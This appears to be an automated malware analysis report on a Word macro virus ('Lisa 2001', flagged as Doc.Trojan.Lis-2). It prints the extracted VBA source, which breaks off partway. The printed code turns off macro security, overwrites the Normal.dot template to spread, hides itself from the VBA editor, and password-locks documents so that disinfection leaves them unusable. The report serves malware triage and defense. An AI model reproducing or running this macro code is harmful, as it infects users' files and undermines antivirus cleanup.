Verdict: MALICIOUS (Risk Score: 180)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to disable macro security and copy itself to the Normal.dot template, indicating a persistence mechanism. The ClamAV detections 'Doc.Trojan.Lis-2' and 'Doc.Trojan.Lily-2' further support its malicious nature.
Heuristics (3)
- ClamAV: Doc.Trojan.Lis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Lis-2
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 35254 bytes |

SHA-256: 83869a349b1c6846618ab25fbd10217f00c27f30fc60c0b69452f25a549a8257

Detection (ClamAV): Doc.Trojan.Lily-2

Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script (the original Russian comments are translated to English below)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'L i s a 2001
'Send all wishes (and new viruses too) to Slava_Atrancev@mail.ru
Dim dvl
Private Sub Document_Close()
dvl = 2
p
End Sub
Private Sub Document_New()
dvl = 3
p
End Sub
Private Sub Document_Open()
dvl = 1
p
End Sub
Private Sub p()
'___Seed the random number generator___'
Randomize
'___Suppress errors___'
On Error Resume Next
'___Disable virus protection for Word 97___'
Application.Options.VirusProtection = False
'___Disable virus protection for Word 2000___'
System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\Security", "level") = 1
If ThisDocument.Name <> "Normal.dot" Then
'___If not running from Normal, then ...___'
'___Wipe Normal.dot___'
a = Application.NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a
'___Write our code into Normal.dot___'
a = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
b = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, a)
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines 1, b
'___Add stealth technology to Normal___'
c = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 1, "Sub viewvbcode()"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 2, "On Error Resume Next"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 3, "a = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 4, "NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, a"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 5, "NormalTemplate.Saved = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 6, "c = Application.Documents.Count"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 7, "For i = 1 To c"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 8, "d = Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.CountOfLines"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 9, "If d > 0 Then"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 10, "Application.Documents.Item(i).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, d"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 11, "Application.Documents.Item(i).Saved = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 12, "End If"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 13, "Next i"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 14, "Application.ShowVisualBasicEditor = True"
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.insertlines c + 15, "End Sub"
'___A small nuisance for antivirus products: on close we password-protect the document against changes, and on open we remove the password, so after disinfection the user will not be able to use this file___'
If dvl = 2 Then
ThisDocument.Protect Type:=wdAllowOnlyFormFields, Password:="vcdjgsqbxcly"
ThisDocument.Save
ThisDocument.Saved = True
End If
If dvl = 1 Then
ThisDocument.Unprotect Password:="vcdjgsqbxcly"
aa = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
cc = ""
For dd = 1 To 12
ee = 0
Do While ee < 97
'___Generate a password randomly___'
ee = Int((122 * Rnd) + 1)
Loop
cc = cc + Chr(ee)
Next dd
For bb = 1 To aa
nn = NormalTemplate.VBProject.VBComponents.Item(1).Cod
```

... (truncated)